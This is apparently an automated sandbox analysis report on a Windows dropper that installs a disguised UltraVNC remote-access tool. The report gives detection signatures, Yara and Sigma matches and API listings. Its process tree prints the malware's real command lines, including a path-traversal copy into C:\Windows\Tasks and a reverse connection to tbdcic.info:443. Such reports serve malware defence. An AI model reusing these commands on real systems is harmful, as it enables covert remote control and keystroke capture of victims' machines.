
Windows Analysis Report
T8xrZb7nBL.exe

Overview

General Information

Sample name:T8xrZb7nBL.exe
renamed because original name is a hash value
Original sample name:d9c7850bde98f2a2cb586b482efd8ff0b6c959ce71f9db699a7b457d5daf5f9e.exe
Analysis ID:1579878
MD5:1677bd5b561b890396ae1816066ca481
SHA1:9ba4b30a162a261b27397bc1dc3736b94b786f65
SHA256:d9c7850bde98f2a2cb586b482efd8ff0b6c959ce71f9db699a7b457d5daf5f9e
Tags:exetbdcic-infouser-JAMESWT_MHT

Detection

UltraVNC
Score:84
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Icon mismatch, binary includes an icon from a different legit application in order to fool users
Yara detected UltraVNC Hacktool
AI detected suspicious sample
Contains VNC / remote desktop functionality (version string found)
Contains functionality to register a low level keyboard hook
Drops executables to the windows directory (C:\Windows) and starts them
Sigma detected: Execution from Suspicious Folder
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: Suspicious UltraVNC Execution
Binary contains a suspicious time stamp
Contains functionality for read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to delete services
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
May sleep (evasive loops) to hinder dynamic analysis
May use bcdedit to modify the Windows boot settings
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Potential Command Line Path Traversal Evasion Attempt
Sigma detected: Suspicious Copy From or To System Directory
Sigma detected: Suspicious Process Start Locations
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Uses taskkill to terminate processes

Classification

  • System is w10x64
  • T8xrZb7nBL.exe (PID: 7828 cmdline: "C:\Users\user\Desktop\T8xrZb7nBL.exe" MD5: 1677BD5B561B890396AE1816066CA481)
    • cmd.exe (PID: 7924 cmdline: "C:\Windows\System32\cmd.exe" /c copy /y "%CD%\*.*" "%CD%\..\..\..\..\..\..\Windows\Tasks\" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7932 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 7980 cmdline: "C:\Windows\System32\cmd.exe" /c cd C:\Windows\Tasks\ & copy 9655269573 9655269573.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7988 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 8036 cmdline: "C:\Windows\System32\cmd.exe" /c cd C:\Windows\Tasks\ & copy 3889122.Khe9oLY 3889122.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 8044 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 8092 cmdline: "C:\Windows\System32\cmd.exe" /c cd C:\Windows\Tasks\ & 9655269573.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 8100 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • timeout.exe (PID: 8144 cmdline: timeout /t 1 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
      • Acrobat.exe (PID: 8188 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Downloads\Lom.pdf" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C)
        • AcroCEF.exe (PID: 5544 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
          • AcroCEF.exe (PID: 2300 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=1876 --field-trial-handle=1608,i,4882657018283466900,1351896089500811277,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
      • timeout.exe (PID: 7208 cmdline: timeout /t 1 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
      • taskkill.exe (PID: 7608 cmdline: taskkill /f /im browser_sn.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
      • timeout.exe (PID: 1296 cmdline: timeout /t 2 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
      • timeout.exe (PID: 4568 cmdline: timeout /t 1 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
      • timeout.exe (PID: 4508 cmdline: timeout /t 2 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
      • browser_sn.exe (PID: 7844 cmdline: C:\Windows\Tasks\browser_sn.exe MD5: 749B3A68B9C5325D592822EE7C2C17EC)
      • timeout.exe (PID: 2056 cmdline: timeout /t 8 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
      • browser_sn.exe (PID: 6020 cmdline: C:\Windows\Tasks\browser_sn.exe -autoreconnect -id:user-PC_Jd0Qd -connect tbdcic.info:443 MD5: 749B3A68B9C5325D592822EE7C2C17EC)
      • timeout.exe (PID: 5844 cmdline: timeout /t 2 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
      • timeout.exe (PID: 6888 cmdline: timeout /t 4 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
      • cmd.exe (PID: 7100 cmdline: cmd /c "C:\Windows\Tasks\3889122.cmd" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • timeout.exe (PID: 5992 cmdline: timeout /t 1 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
        • taskkill.exe (PID: 2788 cmdline: taskkill /f /im browser_sn.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
        • timeout.exe (PID: 6340 cmdline: timeout /t 2 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
        • browser_sn.exe (PID: 5252 cmdline: C:\Windows\Tasks\browser_sn.exe MD5: 749B3A68B9C5325D592822EE7C2C17EC)
        • timeout.exe (PID: 6720 cmdline: timeout /t 8 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
        • browser_sn.exe (PID: 6516 cmdline: C:\Windows\Tasks\browser_sn.exe -autoreconnect -id:user-PC_Jd0Qd -connect tbdcic.info:443 MD5: 749B3A68B9C5325D592822EE7C2C17EC)
        • timeout.exe (PID: 7012 cmdline: timeout /t 4 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
      • timeout.exe (PID: 5592 cmdline: timeout /t 600 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
  • cleanup
No configs have been found
Yara matches (dropped files)
Source | Rule | Description | Author | Strings
C:\Windows\Tasks\browser_sn.exe | JoeSecurity_UltraVNC | Yara detected UltraVNC Hacktool | Joe Security |
C:\Windows\Tasks\Xv6Ya.d8LhT | JoeSecurity_UltraVNC | Yara detected UltraVNC Hacktool | Joe Security |
C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Xv6Ya.d8LhT | JoeSecurity_UltraVNC | Yara detected UltraVNC Hacktool | Joe Security |

Yara matches (memory dumps)
Source | Rule | Description | Author | Strings
00000024.00000002.1778706674.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmp | JoeSecurity_UltraVNC | Yara detected UltraVNC Hacktool | Joe Security |
00000017.00000000.1523572446.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp | JoeSecurity_UltraVNC | Yara detected UltraVNC Hacktool | Joe Security |
0000001B.00000002.1609590258.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmp | JoeSecurity_UltraVNC | Yara detected UltraVNC Hacktool | Joe Security |
00000022.00000000.1696648797.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp | JoeSecurity_UltraVNC | Yara detected UltraVNC Hacktool | Joe Security |
00000000.00000003.1423232596.000000000257B000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_UltraVNC | Yara detected UltraVNC Hacktool | Joe Security |
(19 further memory-dump matches not shown in this excerpt)

Yara matches (unpacked PE files)
Source | Rule | Description | Author | Strings
34.0.browser_sn.exe.7ff6c2b80000.0.unpack | JoeSecurity_UltraVNC | Yara detected UltraVNC Hacktool | Joe Security |
23.0.browser_sn.exe.7ff6c2b80000.0.unpack | JoeSecurity_UltraVNC | Yara detected UltraVNC Hacktool | Joe Security |
27.2.browser_sn.exe.7ff6c2b80000.0.unpack | JoeSecurity_UltraVNC | Yara detected UltraVNC Hacktool | Joe Security |
36.0.browser_sn.exe.7ff6c2b80000.0.unpack | JoeSecurity_UltraVNC | Yara detected UltraVNC Hacktool | Joe Security |
34.2.browser_sn.exe.7ff6c2b80000.0.unpack | JoeSecurity_UltraVNC | Yara detected UltraVNC Hacktool | Joe Security |
(3 further unpacked-file matches not shown in this excerpt)

System Summary (Sigma matches)

Source: Process started | Author: Florian Roth (Nextron Systems), Tim Shelton | Data: Command: C:\Windows\Tasks\browser_sn.exe, CommandLine: C:\Windows\Tasks\browser_sn.exe, CommandLine|base64offset|contains: , Image: C:\Windows\Tasks\browser_sn.exe, NewProcessName: C:\Windows\Tasks\browser_sn.exe, OriginalFileName: C:\Windows\Tasks\browser_sn.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c cd C:\Windows\Tasks\ & 9655269573.cmd, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 8092, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Windows\Tasks\browser_sn.exe, ProcessId: 7844, ProcessName: browser_sn.exe
Source: File created | Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems) | Data: EventID: 11, Image: C:\Windows\SysWOW64\cmd.exe, ProcessId: 8092, TargetFilename: C:\Windows\Tasks\conhost.exe
Source: Process started | Author: Bhabesh Raj | Data: Command: C:\Windows\Tasks\browser_sn.exe -autoreconnect -id:user-PC_Jd0Qd -connect tbdcic.info:443, CommandLine: C:\Windows\Tasks\browser_sn.exe -autoreconnect -id:user-PC_Jd0Qd -connect tbdcic.info:443, CommandLine|base64offset|contains: yr, Image: C:\Windows\Tasks\browser_sn.exe, NewProcessName: C:\Windows\Tasks\browser_sn.exe, OriginalFileName: C:\Windows\Tasks\browser_sn.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c cd C:\Windows\Tasks\ & 9655269573.cmd, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 8092, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Windows\Tasks\browser_sn.exe -autoreconnect -id:user-PC_Jd0Qd -connect tbdcic.info:443, ProcessId: 6020, ProcessName: browser_sn.exe
Source: Process started | Author: Christian Burkard (Nextron Systems) | Data: Command: "C:\Windows\System32\cmd.exe" /c copy /y "%CD%\*.*" "%CD%\..\..\..\..\..\..\Windows\Tasks\", CommandLine: "C:\Windows\System32\cmd.exe" /c copy /y "%CD%\*.*" "%CD%\..\..\..\..\..\..\Windows\Tasks\", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\T8xrZb7nBL.exe", ParentImage: C:\Users\user\Desktop\T8xrZb7nBL.exe, ParentProcessId: 7828, ParentProcessName: T8xrZb7nBL.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c copy /y "%CD%\*.*" "%CD%\..\..\..\..\..\..\Windows\Tasks\", ProcessId: 7924, ProcessName: cmd.exe
Source: Process started | Author: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems) | Data: Command: "C:\Windows\System32\cmd.exe" /c copy /y "%CD%\*.*" "%CD%\..\..\..\..\..\..\Windows\Tasks\", CommandLine: "C:\Windows\System32\cmd.exe" /c copy /y "%CD%\*.*" "%CD%\..\..\..\..\..\..\Windows\Tasks\", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\T8xrZb7nBL.exe", ParentImage: C:\Users\user\Desktop\T8xrZb7nBL.exe, ParentProcessId: 7828, ParentProcessName: T8xrZb7nBL.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c copy /y "%CD%\*.*" "%CD%\..\..\..\..\..\..\Windows\Tasks\", ProcessId: 7924, ProcessName: cmd.exe
Source: Process started | Author: juju4, Jonhnathan Ribeiro, oscd.community | Data: Command: C:\Windows\Tasks\browser_sn.exe, CommandLine: C:\Windows\Tasks\browser_sn.exe, CommandLine|base64offset|contains: , Image: C:\Windows\Tasks\browser_sn.exe, NewProcessName: C:\Windows\Tasks\browser_sn.exe, OriginalFileName: C:\Windows\Tasks\browser_sn.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c cd C:\Windows\Tasks\ & 9655269573.cmd, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 8092, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Windows\Tasks\browser_sn.exe, ProcessId: 7844, ProcessName: browser_sn.exe
No Suricata rule has matched


AV Detection

Source: Submitted Sample | Integrated Neural Analysis Model: Matched 99.2% probability
Source: T8xrZb7nBL.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                            Source: Binary string: conhost.pdbUGP source: T8xrZb7nBL.exe, 00000000.00000003.1421234001.0000000002754000.00000004.00000020.00020000.00000000.sdmp, uqVb3.kkb9h.2.dr, uqVb3.kkb9h.0.dr, conhost.exe.8.dr
                            Source: Binary string: conhost.pdb source: T8xrZb7nBL.exe, 00000000.00000003.1421234001.0000000002754000.00000004.00000020.00020000.00000000.sdmp, uqVb3.kkb9h.2.dr, uqVb3.kkb9h.0.dr, conhost.exe.8.dr
                            Source: C:\Users\user\Desktop\T8xrZb7nBL.exeCode function: 0_2_00403387 GetFileAttributesW,SetLastError,FindFirstFileW,FindClose,CompareFileTime,0_2_00403387
                            Source: C:\Users\user\Desktop\T8xrZb7nBL.exeCode function: 0_2_00402EE6 FindFirstFileW,SetFileAttributesW,lstrcmpW,lstrcmpW,SetFileAttributesW,DeleteFileW,FindNextFileW,FindClose,SetFileAttributesW,RemoveDirectoryW,??3@YAXPAX@Z,??3@YAXPAX@Z,0_2_00402EE6
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 23_2_00007FF6C2BAC210 SetErrorMode,FindFirstFileA,SetErrorMode,FindClose,23_2_00007FF6C2BAC210
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 23_2_00007FF6C2C3A228 __doserrno,_errno,_invalid_parameter_noinfo,_errno,__doserrno,_getdrive,FindFirstFileExA,_errno,_errno,_errno,_errno,_errno,GetDriveTypeA,free,free,_errno,__doserrno,_wsopen_s,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,FindClose,23_2_00007FF6C2C3A228
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 23_2_00007FF6C2B85910 GetModuleFileNameA,FindFirstFileA,SendMessageA,FindNextFileA,FindClose,23_2_00007FF6C2B85910
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 23_2_00007FF6C2BA6DD1 OpenInputDesktop,CloseDesktop,GetTickCount,GetLogicalDriveStringsA,GetDriveTypeA,SHGetMalloc,SHGetSpecialFolderLocation,SHGetPathFromIDListA,SetErrorMode,FindFirstFileA,SetErrorMode,lstrlenA,FindNextFileA,FindClose,LeaveCriticalSection,23_2_00007FF6C2BA6DD1
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 27_2_00007FF6C2BAC210 SetErrorMode,FindFirstFileA,SetErrorMode,FindClose,27_2_00007FF6C2BAC210
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 27_2_00007FF6C2C3A228 __doserrno,_errno,_invalid_parameter_noinfo,_errno,__doserrno,_getdrive,FindFirstFileExA,_errno,_errno,_errno,_errno,_errno,GetDriveTypeA,free,free,_errno,__doserrno,_wsopen_s,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,FindClose,27_2_00007FF6C2C3A228
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 27_2_00007FF6C2B85910 GetModuleFileNameA,FindFirstFileA,SendMessageA,FindNextFileA,FindClose,27_2_00007FF6C2B85910
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 27_2_00007FF6C2BA6DD1 OpenInputDesktop,CloseDesktop,GetTickCount,GetLogicalDriveStringsA,GetDriveTypeA,SHGetMalloc,SHGetSpecialFolderLocation,SHGetPathFromIDListA,SetErrorMode,FindFirstFileA,SetErrorMode,lstrlenA,FindNextFileA,FindClose,LeaveCriticalSection,27_2_00007FF6C2BA6DD1
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 23_2_00007FF6C2BA6DD1 OpenInputDesktop,CloseDesktop,GetTickCount,GetLogicalDriveStringsA,GetDriveTypeA,SHGetMalloc,SHGetSpecialFolderLocation,SHGetPathFromIDListA,SetErrorMode,FindFirstFileA,SetErrorMode,lstrlenA,FindNextFileA,FindClose,LeaveCriticalSection,23_2_00007FF6C2BA6DD1
                            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 23_2_00007FF6C2B8C390 send,recv,23_2_00007FF6C2B8C390
                            Source: global trafficDNS traffic detected: DNS query: x1.i.lencr.org
                            Source: global trafficDNS traffic detected: DNS query: tbdcic.info
                            Source: T8xrZb7nBL.exe, 00000000.00000003.1423232596.0000000002589000.00000004.00001000.00020000.00000000.sdmp, T8xrZb7nBL.exe, 00000000.00000003.1422930123.0000000002931000.00000004.00000020.00020000.00000000.sdmp, Xv6Ya.d8LhT.2.dr, browser_sn.exe.8.dr, Xv6Ya.d8LhT.0.drString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
                            Source: 77EC63BDA74BD0D0E0426DC8F80085060.14.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
                            Source: T8xrZb7nBL.exe, 00000000.00000003.1422930123.0000000002758000.00000004.00000020.00020000.00000000.sdmp, browser_sn.exe, 00000017.00000000.1523572446.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 0000001B.00000000.1606099085.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 0000001B.00000002.1609390889.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000022.00000000.1696648797.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000022.00000002.3280939935.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000024.00000002.1778555450.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000024.00000000.1776497987.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp, Xv6Ya.d8LhT.2.dr, browser_sn.exe.8.dr, Xv6Ya.d8LhT.0.drString found in binary or memory: http://forum.uvnc.com
                            Source: T8xrZb7nBL.exe, 00000000.00000003.1422930123.0000000002758000.00000004.00000020.00020000.00000000.sdmp, browser_sn.exe, 00000017.00000000.1523572446.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 0000001B.00000000.1606099085.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 0000001B.00000002.1609390889.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000022.00000000.1696648797.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000022.00000002.3280939935.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000024.00000002.1778555450.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000024.00000000.1776497987.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp, Xv6Ya.d8LhT.2.dr, browser_sn.exe.8.dr, Xv6Ya.d8LhT.0.drString found in binary or memory: http://java.sun.com/products/plugin/index.html#download
                            Source: T8xrZb7nBL.exe, 00000000.00000003.1422930123.0000000002758000.00000004.00000020.00020000.00000000.sdmp, browser_sn.exe, 00000017.00000000.1523572446.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 0000001B.00000000.1606099085.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 0000001B.00000002.1609390889.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000022.00000000.1696648797.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000022.00000002.3280939935.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000024.00000002.1778555450.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000024.00000000.1776497987.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp, Xv6Ya.d8LhT.2.dr, browser_sn.exe.8.dr, Xv6Ya.d8LhT.0.drString found in binary or memory: http://java.sun.com/update/1.4.2/jinstall-1_4-windows-i586.cab#Version=1
                            Source: T8xrZb7nBL.exe, 00000000.00000003.1423232596.0000000002589000.00000004.00001000.00020000.00000000.sdmp, T8xrZb7nBL.exe, 00000000.00000003.1422930123.0000000002931000.00000004.00000020.00020000.00000000.sdmp, Xv6Ya.d8LhT.2.dr, browser_sn.exe.8.dr, Xv6Ya.d8LhT.0.drString found in binary or memory: http://ocsp.thawte.com0
                            Source: T8xrZb7nBL.exe, 00000000.00000003.1423232596.0000000002589000.00000004.00001000.00020000.00000000.sdmp, T8xrZb7nBL.exe, 00000000.00000003.1422930123.0000000002931000.00000004.00000020.00020000.00000000.sdmp, Xv6Ya.d8LhT.2.dr, browser_sn.exe.8.dr, Xv6Ya.d8LhT.0.drString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
                            Source: T8xrZb7nBL.exe, 00000000.00000003.1423232596.0000000002589000.00000004.00001000.00020000.00000000.sdmp, T8xrZb7nBL.exe, 00000000.00000003.1422930123.0000000002931000.00000004.00000020.00020000.00000000.sdmp, Xv6Ya.d8LhT.2.dr, browser_sn.exe.8.dr, Xv6Ya.d8LhT.0.drString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
                            Source: T8xrZb7nBL.exe, 00000000.00000003.1423232596.0000000002589000.00000004.00001000.00020000.00000000.sdmp, T8xrZb7nBL.exe, 00000000.00000003.1422930123.0000000002931000.00000004.00000020.00020000.00000000.sdmp, Xv6Ya.d8LhT.2.dr, browser_sn.exe.8.dr, Xv6Ya.d8LhT.0.drString found in binary or memory: http://ts-ocsp.ws.symantec.com07
                            Source: T8xrZb7nBL.exe, 00000000.00000003.1423232596.000000000257B000.00000004.00001000.00020000.00000000.sdmp, T8xrZb7nBL.exe, 00000000.00000003.1422930123.0000000002923000.00000004.00000020.00020000.00000000.sdmp, T8xrZb7nBL.exe, 00000000.00000003.1422930123.0000000002758000.00000004.00000020.00020000.00000000.sdmp, browser_sn.exe, 00000017.00000000.1523572446.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000017.00000000.1523669185.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 0000001B.00000002.1609590258.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 0000001B.00000000.1606099085.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 0000001B.00000002.1609390889.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000022.00000000.1696648797.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000022.00000002.3280939935.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000022.00000002.3281159795.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000024.00000002.1778706674.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000024.00000002.1778555450.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000024.00000000.1776497987.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp, Xv6Ya.d8LhT.2.dr, browser_sn.exe.8.dr, Xv6Ya.d8LhT.0.drString found in binary or memory: http://www.uvnc.com
                            Source: T8xrZb7nBL.exe, 00000000.00000003.1422930123.0000000002758000.00000004.00000020.00020000.00000000.sdmp, browser_sn.exe, 00000017.00000000.1523572446.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 0000001B.00000000.1606099085.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 0000001B.00000002.1609390889.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000022.00000000.1696648797.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000022.00000002.3280939935.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000024.00000002.1778555450.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000024.00000000.1776497987.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp, Xv6Ya.d8LhT.2.dr, browser_sn.exe.8.dr, Xv6Ya.d8LhT.0.drString found in binary or memory: http://www.uvnc.comopenhttp://forum.uvnc.comnet
                            Source: 2D85F72862B55C4EADD9E66E06947F3D0.14.drString found in binary or memory: http://x1.i.lencr.org/
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734

Key, Mouse, Clipboard, Microphone and Screen Capturing

